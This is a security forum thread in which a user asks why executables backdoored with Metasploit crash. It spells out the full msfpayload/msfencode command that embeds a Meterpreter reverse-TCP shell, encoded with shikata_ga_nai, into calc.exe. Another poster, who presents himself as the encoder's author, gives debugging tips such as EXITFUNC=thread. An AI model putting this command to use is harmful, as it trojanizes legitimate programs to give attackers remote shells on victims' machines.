Jump to content

Msfencode A Msfpayload Into An Existing Executable > Crash


carloss

Recommended Posts

Hey

I just tryed to put meterpreter into an already existing .exe file.

I tryed it with the calc.exe and a quiz.exe which i programed myself.

In both cases it crashed on my Windows 7 mashine (64bit), it crashed on my winXp pro (32bit) VM too.

I used this command in BT4:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.126 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5

i also tryed encoder x86/countdown... No change.

Could someone help me please? :) I know I´m a noob :P

Link to comment
Share on other sites

I dont know what that does o_O

:P

It was in an article on LINK and i tryed it with it.

On BT4 it does the job without errors like expected but the .exe which gets created does not work at all.

It simply crashed. I tried calc, notepad and a c++ quiz made by me.

Same result: all 3 crashed on 2in7 64bit and XP 32bit.

Then i tried the command on BT3 with the calc, notepad and the quiz.

Result:

The Quiz is working fine! Calc and Notepad are not!

I don´t understand why! O_O

Link to comment
Share on other sites

I dont know what that does o_O

:P

It was in an article on LINK and i tryed it with it.

On BT4 it does the job without errors like expected but the .exe which gets created does not work at all.

It simply crashed. I tried calc, notepad and a c++ quiz made by me.

Same result: all 3 crashed on 2in7 64bit and XP 32bit.

Then i tried the command on BT3 with the calc, notepad and the quiz.

Result:

The Quiz is working fine! Calc and Notepad are not!

I don´t understand why! O_O

Hey carloss, I am scriptjunkie, and I just wrote that encoding method a few weeks ago. (see https://www.metasploit.com/redmine/issues/1244 )

If it's really not working, I'd love to figure out why. Please upload your original and encoded executables. (if that doesn't work, email me, I'll message you my address if it's not already displayed somewhere)

Edit: Be sure in the command to use EXITFUNC=thread. Are you using thread and not seh or process exitfunc? SEH will crash and process will kill the process.

64 bit will not work currently, but I don't know why XP 32 bit won't work.

I have tested with as many exe's as I could, and solved as many bugs as I could, but some are not easily solved and I may have missed some. Did you get any error messages?

Thanks,

scriptjunkie

Edited by scriptjunkie
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...